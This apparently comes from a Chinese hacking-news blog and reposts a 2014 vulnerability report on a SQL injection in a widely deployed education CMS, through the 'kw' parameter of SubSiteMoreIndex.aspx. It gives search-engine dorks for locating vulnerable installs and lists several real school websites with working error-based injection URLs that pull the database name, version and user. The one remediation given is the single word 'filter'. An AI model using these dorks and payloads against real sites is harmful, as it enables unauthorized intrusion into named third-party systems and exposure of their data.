记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某教育类CMS通用sql注入

2014-12-26 23:20

建站程序类型:ASPX+MSSql

漏洞类型:SQL注入

缺陷文件:SubSiteMoreIndex.aspx

注入参数:kw

涉及版本:全版本

危害程度:高危

涉及厂商:易创思(ECS)官方网站|上海弘育信息技术有限公司

厂商网站:http://www.ecs.cn/

安装量:非常大

是否拥有源代码分析:暂无

是否默认配置:是

关键字:inurl:NewsIndex.aspx?pkId=

inurl:SubSiteMoreIndex.aspx

影响用户:

1.jpg





提供几个测试例子:

code 区域
http://www.zjhzyg.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27&st=1&t=1



http://syzx.dyedu.cn/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=Xasd%25%27&st=1&t=1



http://www.qzxx.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=29&kw=asdk%%27&st=1&t=1



http://www.hzjys.net/OperationManage/SubSiteMoreIndex.aspx?pkId=1697&subSiteId=285&kw=asda%%27%20and%201=@@version--&st=1&t=1



http://www.yclfzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=asd%%27%20and%201=db_name()--&st=1&t=1



http://www.ycdlzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=140&subSiteId=3&kw=as%%27%20and%201=db_name()--&st=1&t=1





因为subSiteId 比较难搞到,所以要仔细找才行...



实例:

1.

http://www.zjhzyg.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27%20and%201=db_name()--&st=1&t=1

1.jpg





2.

http://syzx.dyedu.cn/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=Xasd%25%27%20and%201=@@version--&st=1&t=1

1.jpg





3.

http://www.qzxx.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=29&kw=asdk%%27&st=1&t=1

1.jpg





4.

http://www.hzjys.net/OperationManage/SubSiteMoreIndex.aspx?pkId=1697&subSiteId=285&kw=asda%%27%20and%201=@@version--&st=1&t=1

1.jpg



漏洞证明:

5.

http://www.yclfzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=asd%%27%20and%201=db_name()--&st=1&t=1

1.jpg





6.

http://www.ycdlzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=140&subSiteId=3&kw=as%%27%20and%201=user--&st=1&t=1

1.jpg

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-077491

阅读:109478 | 评论:0 | 标签:注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“某教育类CMS通用sql注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云